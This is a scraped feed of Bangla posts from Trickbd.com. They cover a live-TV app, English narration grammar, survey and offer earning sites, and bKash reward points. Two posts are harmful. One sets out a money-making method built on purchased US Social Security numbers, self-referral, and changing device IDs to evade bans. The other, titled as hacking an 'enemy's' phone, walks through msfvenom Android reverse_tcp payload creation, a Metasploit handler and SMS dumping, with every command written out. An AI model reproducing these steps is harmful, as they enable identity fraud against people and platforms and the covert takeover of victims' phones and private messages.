Search box..

BDIX TV 24 দেখুন ১০০+ লাইভ টিভি মোবাইলে বা এন্ড্রয়েড টিভিতে একদম ফ্রি

BDIX TV 24 দেখুন ১০০+ লাইভ টিভি মোবাইলে বা এন্ড্রয়েড টিভিতে একদম ফ্রি


BDIX TV 24 দেখুন ১০০+ লাইভ টিভি মোবাইলে বা এন্ড্রয়েড টিভিতে একদম ফ্রি

Posted:

কিছুদিন আগে আমি ২০০+ লাইভ টিভি এর একটি প্লেয়ার নিয়ে পোস্ট করি।
আজ ৭ তারিখ মানে ৪/৫ দিনে প্রায় ১০০০০+ ভিউ হয়েছে। যার কারনে আমার হোস্টিং এর ব্যান্ডওইথ শেষ হয়ে যায় এবং হোস্টিং সাস্পেন্ড হয়ে যায়।
তাই আর উপায় না দেখে আমি একটি অ্যাপ এর মধ্যে টিভি চ্যানেল গুলো ইম্পলিমেন্ট করে দিই। এতে করে আমার ব্যক্তিগত ব্যান্ডওইথ ও খরচ হবে না এবং আপনারা বিরতিহীন ভাবে মোবাইলে BDIX স্পিডে লাইভ টিভি দেখতে পারবেন। এবং অ্যাপ এ যথারীতি চ্যানেল আপডেট হবে। তাই আশা করি চ্যানেল ড্যাড হবার সম্ভাবনা কম থাকবে।
BDIX TV 24 App Drive Linkঅ্যাপ এখান থেকে ডাউনলোড করে নিন।
এবার নিচের স্ক্রিনশট দিয়ে সব প্রসেস বুঝিয়ে দিচ্ছি।
প্রথমে আপনি যেকোনো রেন্ডম নাম দিয়ে একটা একাউন্ট করে নিবেন। এখানে কোনো আসল নাম বা তথ্য দেবার দরকার নাই। ইচ্ছা মত দিবেন আরকি।


আন্দাজে একাউন্ট করার পর দেখবেন আপনার তথ্য সেইভ হয়ে যাবে এবং এখন ৫ টি ভাগে ১০০+ টিভি চ্যানেল রাখা হয়েছে।

বাংলাদেশি চ্যানেলের একাংশ

চ্যানেলের স্ক্রিনশট


হিন্দি চ্যানেলের একাংশ


স্পোর্টস, নিউজ, এন্টারটেইনমেন্ট চ্যানেলের কিছু স্ক্রিনশট এ দেখানো হলোঃ




আশা করি সব বুঝতে পেরেছেন। কোথাও কোনো সমস্যা থাকলে কমেন্টে জানাতে পারেন।

চাইলে BDIX TV এর টেলিগ্রাম চ্যানেলে জয়েন দিয়ে নিতে পারেন সামনের আপডেট এবং নতুন কোনো চ্যানেল দরকার হলে চ্যানেলে কমেন্ট করলেই হবে। সেই সাথে চ্যানেলে ভিডিও আছে কিভাবে অ্যাপ এ টিভি দেখবেন সব দেখানো আছে।

The post BDIX TV 24 দেখুন ১০০+ লাইভ টিভি মোবাইলে বা এন্ড্রয়েড টিভিতে একদম ফ্রি appeared first on Trickbd.com.

Education guide: English narration লেখার রুলস (বিস্তারিত পোস্টে)

Posted:

আসসালামুআলাইকুম ওয়ারাহমাতুল্লাহি ওয়াবারাকাতুহ। Narration ইংলিশ গ্রামারের ন্যারেশন যেটা আমরা, আজকে আলোচনা করব। বিশেষ করে যারা ইংলিশ গ্রামারের দুর্বল, Narration নারেশন সম্পর্কে আমরা অনেকেই দুর্বল। যারা ইংলিশ গ্রামারের Narration অংশে একেবারেই দুর্বল তাদের জন্য আমাদের আজকের এই আর্টিকেল।

যদিও গত আরেকটি আর্টিকেল পাবলিশ করেছিলাম, সেখানে আমরা ন্যারেশন Narration এর প্রথম অংশ সংক্ষিপ্তাকারে শেয়ার করেছিলাম। তাছাড়া ন্যারেশন Narration এর কিছু অংশ বাদ দিয়ে রেখেছিলাম। কিন্তু আজকের এই আর্টিকেলের আমরা ঠিক ওই জায়গা থেকে শুরু করে, Narration এর শেষ পর্যন্ত বিস্তারিত জানব। চলুন কথা না বাড়িয়ে, Narration এর নিয়ম ও রুল সম্পর্কে বিস্তারিত জেনে নিই।

Narration কাকে বলে?

ন্যারেশনঃ সাধারণত ন্যারেশন শব্দের অর্থ হল উক্তি। আর একজন ব্যক্তি যা বলে তাই উক্তি। অর্থাৎ ন্যারেশন শব্দের অর্থ উক্তি ও কোন লোক বা ব্যক্তি কোন কিছু বললে সেটা কে সাধারনত নারেশন বলে। আশাকরি নারেশন এর ব্যাপারটি আপনারা বুঝতে পেরেছেন। এখন কথা হল ন্যারেশন কত প্রকার ও কি কি?

Narration কত প্রকার ও কি কি?

ন্যারেশন সাধারণত দুই প্রকার হয়ে থাকে। তার মধ্যে একটি হলো ডাইরেক্ট নেরেশন। অন্যটি ইনডাইরেক্ট নারেশন। ইনডাইরেক্ট নারেশন অর্থাৎ নিজের মতো করে বলা। আর ডাইরেক্ট নেরেশন অর্থাৎ হুবহু বলা। বন্ধুরা এই ছিল নারেশন এর প্রকার ও নারেশন কাকে বলে বিস্তারিত। এখন প্রশ্ন হলো ন্যারেশন এর রুলস কি কি? আর নারেশন লেখার নিয়ম নীতি গুলো কি কি? চলুন এখন আমরা ন্যারেশন এর রুলস নিয়ে বিস্তারিত জেনে নিই।

Narration ন্যারেশন এর নিয়ম নীতি বা রুলস?

ইংরেজি গ্রামার ন্যারেশন লেখার অনেক নিয়ম রয়েছে। এর ভিতর বিস্তারিতভাবে আলোচনা করলে, আপনার মাথা হয়তো গুলিও যেতে পারে। তাই আমরা শর্টখাট করে বিস্তারিত জানার চেষ্টা করব যাতে করে। আমরা ন্যারেশন লেখার রুলস সম্পর্কে ধারণা রাখতে পারি। এবং পরীক্ষায় ন্যারেশন আসলে যেন আমরা সহজে বিস্তারিত লিখতে পারি।

#কোন বাক্যে পরিপূর্ণ মনের ভাব প্রকাশ করতে যদি একটি শব্দ ব্যবহার করা হয়, যেমনঃ well,fine,fifty taka সে ক্ষেত্রে তার পূর্বে It was যুক্ত করতে হয়।

যেমন উদাহরণ হিসেবেঃ

He said to me, “Well.”

He told me that it was well.

#কাউকে কোন নামে সম্বোধন করলে, যেমন uncle, aunty সে ক্ষেত্রে ওই সম্মোধন কৃত নামের জন্য addressing him/her as uncle/aunty, তারপর বাকি অংশের সব আগের মত লিখতে হবে।

#Thank you যুক্ত বাক্যের ক্ষেত্রে Sub+ thanked+obj.

যেমন উদাহরণ হিসেবেঃ
He said to me,” thank you.”

He thanked me.

#Sir থাকলে যুক্ত চিহ্নের আগে বা রিপোর্টিং ভার্ব এর পর respectfully বসে বা বসাতে হবে।

#No থাকলে রেপ্লাইড ইন দি নেগেটিভ(replied in the negative) আর অন্যদিকে, yes / ok থাকলে একইভাবে লিখতে হবে, replied in the affirmative. আশা করি এই বিষয়টি বুঝতে পেরেছেন।

#By Allah থাকলে লিখতে হবে , swearing by Allah তারপর বাকি অংশগুলো আগের মতই লিখে যেতে হবে।

#Good night, good bye, bye সাধারণত এই জাতীয় শব্দ দ্বারা কাউকে বিদায় জানালে, সে ক্ষেত্রে said এর পরিবর্তে bade বসে। এবং অতিরিক্ত কোন কিছু যুক্ত করার প্রয়োজন এই ক্ষেত্রে করতে হয়না।

যেমন উদাহরণ হিসেবেঃ

He is said to me, ” good night.”

He bade me good night.

#Good morning, good afternoon, congratulation, good evening, happy birthday to you সাধারনত এই জাতীয় বাক্য বার শব্দ দ্বারা কাউকে, অভ্যর্থনা জ্ঞাপন করলে সে ক্ষেত্রে। Said এর পরিবর্তে বসাতে হবে, wished. আর এই ক্ষেত্রে অতিরিক্ত কোন কিছু যুক্ত করার প্রয়োজন হয় না।

যেমন উদাহরণ হিসেবেঃ

He said to me, “good morning.”

He wished me good morning.

Narration ন্যারেশন শেখা বা লেখার নিয়ম?

প্রিয় বন্ধুরা আপনারা উপরোক্ত নিয়ম-নীতিগুলো ফলো করে, Narration শেখা বা লিখতে পারেন খাতায়। কারণেই উপরোক্ত নিয়ম মেনে নারেশন লিখতে হয়। কোথাও কিছু বুঝতে অসুবিধা হলে কিংবা ন্যারেশন সম্পর্কে কোন কিছু জানার থাকলে। সেটা অবশ্যই কমেন্টের মাধ্যমে জানাতে একদমই ভুলবেন না। আর আজকে ন্যারেশন এ পর্যন্তই। এখন ন্যারেশন বাক্যে ব্যবহৃত বিশেষ কয়েকটি শব্দ পরিবর্তন হয়ে থাকে, এগুলো শিখতে বা জানতে পারলেই নারেশন শেষ হয়ে যাবে পুরোপুরি। তাই চলুন এখন আমরা এগুলো সম্পর্কে বিস্তারিত এখনি জেনে নিই।

বাক্যে ব্যবহৃত বিশেষ কয়েকটি শব্দ পরিবর্তন ঘটাতে হয় Narration?

***Direct থাকলে indirect.

***Yesterday থাকলে the previous day.

***Today থাকলে that day.

***Tomorrow থাকলে the next day.

***This থাকলে that.

***This pen থাকলে that pen.

***Now থাকলে then.

***Come থাকলে go.

***Here থাকলে there.

***Ago থাকলে before.

***Last week/year থাকলে the previous week/year.

***These থাকলে those.

সুপ্রিয় শিক্ষার্থী বন্ধুরা, আশা করি আপনারা Narration নেরেশন সম্পর্কে সঠিক ধারণা টি পেয়েছেন। উপরোক্ত নিয়ম-নীতি ও রুলস সমূহ ভালোভাবে, এনালাইসিস বা পড়লে আপনারা অবশ্যই, পরীক্ষার খাতায় ন্যারেশন লিখতে সক্ষম হবেন। যদিও সংক্ষিপ্ত রূপে আপনাদেরকে বিস্তারিত জানানোর চেষ্টা করেছি। যদি কোথাও বুঝতে অসুবিধা হয় তাহলে অবশ্যই কমেন্ট সেকশনে ও জানাতে ভুলবেন না।

আর্টিকেল সম্পর্কিত শেষ কথা?

প্রিয় বন্ধুরা, আশা করি আপনারা আমাদের আজকের এই আর্টিকেলটি বিস্তারিত ভাবে বুঝতে পেরেছেন। এবং আজকে আমরা নারেশন Narration পার্ট বা অংশটি একেবারে শেষ করে ফেলেছি। তাই ন্যারেশন সম্পর্কে যদি কোথাও প্রশ্ন থেকে থাকে তাহলে সেটা অবশ্যই কমেন্ট করবেন। এবং আপনার এ বিষয়ে কোনো মন্তব্য থেকে থাকলে সেটা কমেন্টে জানাতে পারেন। সবাই ভালো থাকবেন সুস্থ থাকবেন এবং নিরাপদে থাকবেন। আশা কামনা করে বিদায় দিব, আসসালামুআলাইকুম ওয়ারাহমাতুল্লাহি ওয়াবারাকাতুহ।

The post Education guide: English narration লেখার রুলস (বিস্তারিত পোস্টে) appeared first on Trickbd.com.

আনলিমিটেড ডলার আর্ন করুন সিক্রেট মেথড (সার্ভে সিরিজ পর্ব – ৯ )

Posted:

আনলিমিটেড ডলার আর্ন করার সিক্রেট মেথড এর প্রথম পর্বে আপনাকে স্বাগতম। চলুন দেরী না করে বিস্তারিত শুরু করা যাক আজকের আয়োজন। 

 

আনলিমিটেড ডলার আর্ন করতে চাইলে এটার জন্য আপনাকে কিছু স্টেপ ফলো করতে হবে এবং সব কিছু সঠিক ভাবে করতে পারলে আপনি আনলিমিটেড ডলার আর্ন করতে সক্ষম হবেন।

 

প্রথমত কাজ টি করার জন্য আপনার যা দরকার হবে তার তালিকা দেখে নিনঃ-

  1.  SSN
  2.  Google Voice
  3.  Mobile Device
  4.  Vpn (US Server)
  5.  Gmail

যদি উল্লেখিত জিনিস গুলো আপনার তালিকায় থাকে তবে আপনি ২য় স্টেপ টিতে যাওয়ার জন্য প্রস্তুতঃ-

 

প্রথমে আপনি মোবাইলের জন্য যে কোন ভিপিএন ডাউনলোড করে নিন এবং তা US সার্ভার দিয়ে কানেক্ট করে নিন।
কানেক্ট হয়ে গেলে নিচের লিংক থেকে এপ টি ডাউনলোড করতে হবে।
 
রেফার ছাড়া

 

ডাউনলোড করার সময় অনেকের প্রবলেম হতে পারে যদি US মেইল না হয় সেক্ষেত্রে আপনি প্লে স্টোর এর ডাটা ক্লিয়ার করে ট্রাই করতে পারেন কিন্তু রেফার ব্যতীত ডাউনলোড করলে কাজ হবে না।

 

সো ডাউনলোড হয়ে গেলে এপ ওপেন করুন।

অবশ্যই Country US নির্বাচন করতে হবে ।

 

এবার আপনার মেইল নির্বাচন কিংবা সাইন ইন করা না থাকলে মেইল লগিন করতে করতে হবে।  
এবং যে মেইল দিয়ে একাউন্ট খুলতে চান তা নির্বাচন করে Continue করে দিন। US মেইল হলে কোন প্রবলেম হবে না কিন্তু তারপরেও আপনি চাইলে BD মেইল দিয়ে ট্রাই করতে পারেন।
 

এবার কাজ হচ্ছে আপনার গুগল ভয়েস নাম্বার দিয়ে ভেরিফাই করে নেওয়া 

 

গুগল ভয়েস নাম্বার দিয়ে ভেরিফাই করা হয়ে গেলে চলুন বাকী স্টেপ গুলো দেখে নেওয়া যাক।

 

এবার জাস্ট আমাদের Next বাটনের সাথে কিছুক্ষন ফাইট করতে হবে তাই Next বাটনে ক্লিক করে দিন।

 Yes বাটনে চেপে দিন

Yes, Earn Reward বাটনে ক্লিক করে দিন।

 

সব কিছু ঠিক ভাবে করলে একাউন্ট ওপেন দেখা যাবে এখন আমাদের ভেরিফাই করতে হবে। 
ভেরিফাই করার জন্য আপনাকে ডান পাশে উপরের প্রোফাইল বাটনে ক্লিক করতে হবে।
 

প্রোফাইলে ক্লিক করার পর আপনি ব্যালেন্স জিরো দেখতে পাবেন সেখানে ক্লিক করুন। 

 

আপনি ভেরিফাই বাটন দেখতে পাবেন সেই Verify লেখার উপর ক্লিক করুন। এরপর আপনাকে একটি ফর্ম পেজ এ রিডাইরেক্ট করবে। আপনার কাজ হবে আপনার পেইড SSN এর সকল তথ্য দিয়ে পূরন করা।

যদি SSN ভালো হয় একাউন্ট ভেরিফাই লেখা দেখতে পাবেন।
 

এবার হচ্ছে মূল কাজ আর তা হলো আপনাকে ৫ ডলার সেন্ড করতে হবে যে কাউকে তাহলে আপনি ৫ ডলার বোনাস পাবেন। আপনি চাইলে Gpay ব্যবহার করছে এমন যে কারো থেকেই নিতে পারেন কিছুক্ষনের জন্য কিংবা পে করে। 

আপনি রেফার বোনাস কালেক্ট করার পর আপনাকে আনলিমিটেড ডলার আর্ন করার জন্য যা করতে হবে তা হলোঃ
আপনার সদ্য বানানো একাউন্ট থেকে ফ্রেন্ড বা ফ্যামিলি কিংবা নিজেই একটু কারসাজি করে আরেকটা একাউন্ট রেফার করতে হবে।
প্রতি সাকসেস রেফার এর জন্য আপনি ১৫ ডলার করে পাবেন আর এভাবে আপনাকে ট্রাই করে যেতে হবে আনলিমিটেড ডলার লুফে নিতে হলে।  আর যে রেফার লিংক থেকে একাউন্ট করবে সে ৫ ডলার বোনাস পাবে।
যার মানে হলো নিজেই যদি নিজেকে রেফার করে কাজ করতে পারেন তবে প্রতি রেফার থেকে আর্ন হবে ২০ ডলার করে।
 
তবে এটাও মনে রাখতে হবে প্রতি একাউন্ট থেকে মাত্র ৩ জন রেফার এর জন্য আপনি বোনাস পাবেন।
 
 
তবে মনে রাখতে হবে প্রতিটি আলাদা একাউন্টের জন্য আলাদা আলাদা গুগল ভয়েস SSN এন্ড মেইল ব্যবহার করতে হবে নয়তো কাজ নাও করতে পারে।
 
আর শতর্কতা হলো যে আপনি সেম ডিভাইস থেকে কাজ করলে রিসেট কিংবা ডিভাইস আইডি চেঞ্জ করে নিতে পারেন।
আর সব কিছু আলাদা ব্যবহার করতে পারলো আরো ভালো।
 
এবার ২৪ ঘন্টার আর্ন এর পেমেন্ট প্রুফ দিচ্ছি দেখে নিন।

 

এগুলো নিজেই নিজেকে যখন রেফার করেছি 

 

 

আর এগুলো হচ্ছে সব রেফার আর্ন এর ডলার একজায়গার করার পর এন্ড তবে কিছু একাউন্ট ২০ ডলার সহ সাসপেন্ড ও খেয়েছি ব্যাপার না যা পেয়েছি ওকে বাকীটা আগামী ২৪ ঘন্টায় পুষিয়ে নেবো।

 
তবে এটাও বলে রাখছি যে সব একাউন্টে পাই নি হয়তো সেম ডিভাইসে ট্রাই করেছিলাম তাই। বাই দা ওয়ে আমি আমার আইডিয়া আপনাদের সাথে শেয়ার করে দিলাম আশা করি বুঝতে পারবেন।
 
আর চাইলে আমার গ্রুপে জয়েন হতে পারেন ডেইলি আমাদের কাজ সম্পর্কে জানার জন্য নিচের লিংক থেকে 
 

The post আনলিমিটেড ডলার আর্ন করুন সিক্রেট মেথড (সার্ভে সিরিজ পর্ব – ৯ ) appeared first on Trickbd.com.

সফটওয়্যার টেস্ট করে ডলার আর্ন করতে চান ( সার্ভে সিরিজ – পর্ব – ৮ )

Posted:

সফটওয়্যার টেস্ট করে  ডলার যদি আর্ন করতে চান তবে সম্পূর্ন পোষ্ট টি ভালো করে পড়ুন আপনিও পাবেন যদি সময় থাকতে করেন।

 

সফটওয়্যার টেস্ট বলতে আমি বোঝাতে চেয়েছি যে কোন একটা সফটওয়্যার ডাউনলোড এবং ইন্সটল করার জন্য একটা প্রফিট আর্ন করা তবে এটা সরাসরি করলে লাভ হবেনা সো কিভাবে করবেন তা বিস্তারিত দেখে নেওয়া যাক।

 

যেহেতু এটা সার্ভে সিরিজের অন্তর্ভুক্ত তাই অবশ্যই আপনার US এর রেসিডেন্সিয়াল আইপি থাকা চাই।

যদি না থাকে তবে তার সমাধান ও আর্টিকেল এর মাঝেই পেয়ে যাবেন। 

তবে সবার আগে আপনার সার্ভে সম্পর্কে কিছুটা হলেও জ্ঞান থাকা দরকার তাই সিরিজের অন্য পর্ব গুলো দেখে নিতে পারেন।

 

 

Cointiply.Com


Cointiply ট্রাস্টেড একটি সাইট তবে কাজ করার জন্য US রেসিডেন্সিয়াল আইপি দরকার হবে। আইপি যদি ভালো মানের হয় তবে সার্ভে কাজ করা যাবে। আর পাশাপাশি আপনি এখানে অফার  পূরন করেও আর্ন করতে পারবেন। 

 

 

এখানে আপনি এপ ডাউনলোড এবং গেমস ইন্সটল এন্ড মিশন  এর অফার পূরন করে কিংবা ভিডিও দেখে , পিটিসি এড দেখে , রেফার করে , গেমস খেলে কিংবা সার্ভে করে পয়েন্ট আর্ন করতে পারবেন।

এখানের পয়েন্ট সিস্টেম টা হচ্ছে ১০,০০০ হাজার পয়েন্ট = ১ ডলার এবং সর্বনিম্ন ৩ ডলার হলে LTC, Doge , Dash কয়েন পেমেন্ট মেথড ব্যবহার করে উইথড্রো করতে পারবেন। আর যদি বিটিসি তে উইথড্রো নিতে চান তবে অবশ্যই ৫ ডলার মিনিমাম ব্যালেন্স থাকতে হবে।

আর এই সাইটের বিশেষ একটা ফিচার হলো চ্যাট করেও Rainpool এর মাধ্যমে আয় করা যায়। 

এই সাইটে একটি সার্ভে পূরন করার জন্য সর্বোচ্চ ৫-৮ ডলার পেতে পারেন সার্ভে ভেদে। আর গেমস এর ক্ষেত্রে একটি গেমস অফার পূরন করে সর্বোচ্চ ২০-৩০ ডলার পর্যন্ত আয় করতে পারবেন।  আর পেমেন্ট ২৪ ঘন্টার মধ্যে তারা দিয়ে থাকে। গত ৩ মাসে এই সাইট থেকে আমার সংগ্রহ ৮০০+ ডলার। 

Gamehag.com

 

 

GameHag সাইট টি হতে পারে গেম প্রিয় মানুষ গুলোর জন্য সেরা একটি আর্নিং সাইট কারন এখানে গেমস টেস্টিং এবং মিশন কমপ্লিট করে আপনি পেমেন্ট নিতে পারবেন সাথে প্রিমিয়াম গেমস গুলোর সিডি কি এখান থেকে সংগ্রহ করতে পারবেন। গিভওয়ে থেকেও অনেক কিছু জিতে নিতে পারবেন। 

আর এই সাইটের উইথড্রো মেথড গুলো অনেক রয়েছে আপনি চাইলে আপনার পছন্দের গেমস এর জন্য রিওয়ার্ড নিতে পারবেন যেমন ধরে নিন PUBG, Freefire, GTA V ইত্যাদি।

আপনি চাইলে এখান থেকে রিওয়ার্ড জিতেও গেমস টপ আপ করতে পারবেন ।

আবার চাইলে গিফট কার্ডে পেমেন্ট নিতে পারবেন যেমন ধরে নিন Google Gift Card, Amazon , Walmart, Netflix, Skype ইত্যাদি। 

যদি চান ক্রিপ্ট তে পেমেন্ট নিবেন তাও সম্ভব সো যারা গেমস খেলতে পছন্দ করেন তারা চাইলে এই সাইট ট্রাই করতে পারেন তবে বলে নেই এই সাইটে এক আইপি দিয়ে কাজ করতে হবে নয়তো ব্যান হয়ে যাবেন আর অন্যদিকে এটাও লক্ষ্য রাখতে হবে আপনি যে গেমস ডাউনলোড ইন্সটল এবং প্লে করছেন সেটাও সেম আইপি কিনা যদি সেম আইপি না হয় তাহলেও ব্যান করে দিবে।


তো চলুন দেখে নেই কিছু স্ক্রিনশর্টঃ

 

 

 

 

 

 

আশা করি উপরের দুইটা সাইট সম্পর্কে আপনাদের ধারনা দিতে পেরেছি এবার আমাদের ট্রিক এখান থেকে শুরু হতে যাচ্ছে।

প্রথমে আপনাদের Cointiply.com সাইটে একটি একাউন্ট তৈরী করে নিতে হবে আর একাউন্ট করার জন্য পেয়ে যাবেন ১০০০ কয়েন বোনাস যদি মেইল ভেরিফাই করে থাকেন।

একাউন্ট যদি করে থাকেন তবে তাদের Earn Menu থেকে Special Offer নির্বাচন করতে হবে।

 

আপনি Gamehag এর অফার টি দেখতে পাবেন এখানে বলা হয়েছে আপনার GameHag.Com সাইটে একটি একাউন্ট করার জন্য এবং একাউন্টে ৫০০ পয়েন্ট মেক করার জন্য আর আপনি যদি তা সঠিক ভাবে করেন তবে আপনি পাবেন ২,৫৫০ কয়েন অফারটির জন্য।  

Complete This Offer & Earn 2550 বাটনে ক্লিক করুন।

সাইন আপ করে নিন সাথে মেইল ভেরিফাই করে নিবেন।

আপনি Quest Menu দেখতে পাবেন সেখান থেকে Load More  এ গিয়ে আপনাকে খুজে নিতে হবে Opera GX এবং Complete বাটনে ক্লিক করে দিতে হবে।

আপনার নতুন একটি পৃষ্ঠায় রিডায়রেক্ট করাবে আপনাকে বেছে নিতে হবে Play For Free বাটন এন্ড ক্লিক করে দিতে হবে।

আপনাকে বলা হয়েছে যে আপনি যে গেমস ডাউনলোড করবেন তার ইউজার নেম এবং Gamehag এর ইউজার নেম যাতে সেম থাকে একাউন্ট তৈরী করার সময়। কিন্তু আমরা যেহেতু সফটওয়্যার ডাউনলোড করছি তাই এর তেমন একটা দরকার হবেনা।  Go To Game বাটনে ক্লিক করে দিন।

 

আপনাকে Opera GX এর অফিশিয়াল পেজ এ রিফাইরেক্ট করে নিয়ে আসবে আপনাকে Download Opera GX বাটনে ক্লিক করে দিতে হবে। 

 

এবার অটো অপেরা Exe ফাইল ডাউনলোড হবে আপনার কাজ হবে ডাউনলোড ফাইলে ডাবল ক্লিক করে দেওয়া এবং ইন্সটল এর অনুমতি দিয়ে দেওয়া। 

 

সম্পূর্ন ডাউনলোড হয়ে গেলে ইন্সটল অটো হয়ে যাবে অপেক্ষা করুন।

ইন্সটল হয়ে গেলে ২-৩ ঘণ্টার মাঝে আপনাকে কনফার্মেশন মেইল দিয়ে জানিয়ে দেওয়া হবে এবং আপনার Cointiply এবং Gamehag একাউন্টে পয়েন্ট জমা হয়ে যাবে। 

 

কনফার্মেশন মেইল এর প্রুফ ।

 

 

দেখুন ২৫৫০ পয়েন্ট যোগ হয়ে গিয়েছে এটা ছিলো জাস্ট একটা উদাহরণ আপনি চাইলে এভাবেই আপনার পছন্দের কাজ গুলো করে টুকটাক আর্নিং এর কাজ টা সেরে নিতে পারবেন। 

যে দুটি সাইটের রিভিউ করলাম দুটোই ট্রাস্টেড সো আপনি চাইলে নিজে একবার ট্রাই করে দেখতে পারেন। আর এখন থেকে প্রতিদিন সার্ভে সিরিজ এর পর্ব শেয়ার করা হবে তাই ডেইলি রাতে একবার ভিজিট করতে ভুলবেন না কিন্তু।  

 

 

The post সফটওয়্যার টেস্ট করে ডলার আর্ন করতে চান ( সার্ভে সিরিজ – পর্ব – ৮ ) appeared first on Trickbd.com.

কিভাবে metasploit দিয়ে শত্রুর ফোন হ্যাক করবেন। না দেখলে চরম মিস করবেন।

Posted:

আসসালামু আলাইকুম । আশা করি সকলে ভালো আছেন । আমিও আলহামদুলিল্লাহ আপনাদের দোয়ায় অনেক ভালো আছি ।

আজ আমি আপনাদের দেখাবো কিভাবে metasploit দিয়ে virus or payload তৈরি করতে হয়।  এবং কিভাবে একটা ফোনের সকল কিছু access নিবেন প্রমাণ সহ।  এইটা অবশ্যই কেউ খারাপ কাজে ব্যবহার করবেন না আর যদি করেন তাহলে trickbd ট্রিম এবং আমি দায়ী থাকবো  না।

যা যা লাগবে :

১)  আপনার ফোনে termux ইনস্টল থাকতে হবে ।

২ )  আপনার ফোনে metasploit ইনস্টল থাকতে হবে।

৩) আপনার ফোনে অবশ্যই নেই কানেকশন রাখবেন।

তো কাজে আশা যাক।

প্রথমে আমরা termux কে আপডেট করে নিবো তার জন্য কমান্ড pkg update -y লিখে ইন্টার ।

এখন আমরা termux কে আপগ্রেড করে নিবো তার জন্য কমান্ড pkg upgrade -y লিখে ইন্টার ।

এখন আমরা metasploit এর payload তৈরি করবো তার জন্য আমরা কমান্ড দিবো।

msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > /sdcard/payload.apk

কমান্ড টা দিয়ে ইন্টার দিবো।

কয়েক সেকেন্ড সময় লাগবে payload টা তৈরি হতে।  যদি সফল ভাবে তৈরি হয়ে যায় তাহলে এই রকম ইন্টার পেইজ দেখতে পারবেন।

দেখতে পাচ্ছে আমার payload টা তৈরি হয়ে গেছে।  মাত্র ৯.৯৪ কেবি payload দ্বারা আপনার ফোনের সকল access নেওয়া সম্ভব।  এখন আমরা payload কে ইনস্টল করবো।  কিন্তু এখন ওপেন করবো না।

ইনস্টল হলে আমরা termux চলে যাবো। এখন আমরা রান করবো metasploit তাই msfconsole লিখে ইন্টার দিবো একটু সময় লাগবে রান হতে।

এখন আমরা মাল্টি handler এ চলে যাবো  তার জন্য কমান্ড হলো  use exploit /multi/handler লিখে ইন্টার করবো।

এখন বলে দিতে হবে আমরা কোন ধরনের payload ব্যবহার করছি। আমরা অবশ্যই reverse_tcp ব্যবহার করছি । এখন আমাদের কোন ফোনের জন্য payload তৈরি করছি সেটা বলতে হবে তার জন্য কমান্ড হলো set payload android/meterpreter/reverse_tcp লিখে ইন্টার করবো।

এখন আমাদের লোকাল হোস্ট দিতে হবে।  আমরা যখন payload টা তৈরি করছি তখন যেই লোকাল হোস্ট টা ব্যবহার করছি এখন সেই লোকাল হোস্ট টা দিতে হবে।  set LHOST 127.0.0.1 লিখে ইন্টার দিবো।

Payload তৈরি সময় আমরা যেই LPORT দিয়েছি এখন সেই LPORT দিয়ে ইন্টার করবো।

এখন আমরা রান করবো তাই run লিখে ইন্টার করবো।

রান করার পর এই রকম পেইজ দেখতে পারবেন।  এখন আমরা যেই payload টা ইনস্টল করছি সেইটা একটা ক্লিক করবো ।

Payload টা active হলে এই রকম ইন্টার পেইজ দেখতে পারবেন। এবং meterpreter ওপেন হয়ে যাবে । এখন help আমরা পছন্দের কমান্ড নিয়ে আসবেন।

আমি আপনাদের প্রমাণ দেখানোর জন্য dump_sms কমান্ড নিয়ে ইন্টার করবো।

দেখতে পাচ্ছেন আমার ফোনের যত মেসেজ আছে সব একটি ফাইলে চলে আসছে।  এই ফাইলটি দেখার জন্য আমরা termux এ হাতের বাম দিক থেকে ডান দিকে স্লাইড করবো।

এই রকম ইন্টার পেইজ আসবে এখন new session ক্লিক করবো ।

এখন ls দিয়ে ইন্টার দিবো।  এবং দেখতে পাবো একটু আগে যেই dump_sms ফাইলটি সেভ হয়েছে সেইটি।

এখন আমরা ফাইলটি ওপেন করবো তার জন্য cat লিখে ফাইলের নাম টা কপি করে নিয়ে আসবো এবং ইন্টার ক্লিক করবো ।

এখন দেখতে পাচ্ছেন আমার ফোনে মোট ১৩৯৭ টি মেসেজ আছে । একটি মেসেজের সব details দেখতে পাবেন।

তো আজ এই পর্যন্তই ভালো থাকবেন।  বুঝতে সমস্যা হলে কমেন্ট করবেন। লেখায় যদি কোন ভুল হয়ে থাকে তাহলে ক্ষমা দৃষ্টিতে দেখবেন।

Facebook

YouTube

 

The post কিভাবে metasploit দিয়ে শত্রুর ফোন হ্যাক করবেন। না দেখলে চরম মিস করবেন। appeared first on Trickbd.com.

bKash এপস ব্যবহারকারীরা এবার মাত্র ১ টাকা Pay Bill করুন। আর নিয়ে নিন বেশি বেশি Reward Point যা দিয়ে ১০-২৫০ টাকা পর্যন্ত ক্যাশব্যাক নিতে পারবেন।

Posted: 07 Dec 2021 01:20 AM PST

আসসালামু আলাইকুম।
আশা করি সকলেই ভালো আছেন। আমিও আল্লাহর রহমতে ভালো আছি। আজ আমি আপনাদের মাঝে bKash এর ছোট্ট একটি ট্রিকস শেয়ার করবো। যারা জানেন তাদের জন্য না, যারা জানেনা শুধু তাদের জন্যই আমার আজকের পোস্টটা। চলুন শুরু করা যাক।

বর্তমানে bKash ব্যাবহার করেনা এমন লোক হয়তো খুঁজে পাওয়া কঠিন হয়ে যাবে । তবে একেবারেই নেই সেটাও বলবো না। যারা bKash ব্যবহার করেন এবং তার সাথে bKash অ্যাপ ব্যবহার করে লেনদেন করেন শুধুমাত্র তাদের উদ্দেশ্যে পোস্ট করা হয়েছে । আপনারা যারা bKash অ্যাপ ব্যবহার করেন, তাদের মধ্যে অনেকই bKash Reward Point সম্পর্কে জানেন আবার অনেকেই এই বিষয়ে অবগত নন। তাহলে আগে জেনে নেই bKash Reward Point কি?

bKash Reward Point: বিকাশ তাদের গ্রাহকের কথা চিন্তা করে লেনদেনের উপর একটি বিশেষ Reward এর ব্যাবস্থা করেছে। এই Reward টি কয়েকটি ধাপে বিভক্ত। যেমন: ১. ব্রোঞ্জ, ২. সিলভার, ৩. টাইটেনিয়াম, ৪. গোল্ড, ৫. প্লাটিনাম, ৬. ডায়মন্ড। নিচের মত Reward Icon এ ক্লিক করে আপনি bKash এর Reward জগতে ঢুকতে পারবেন।

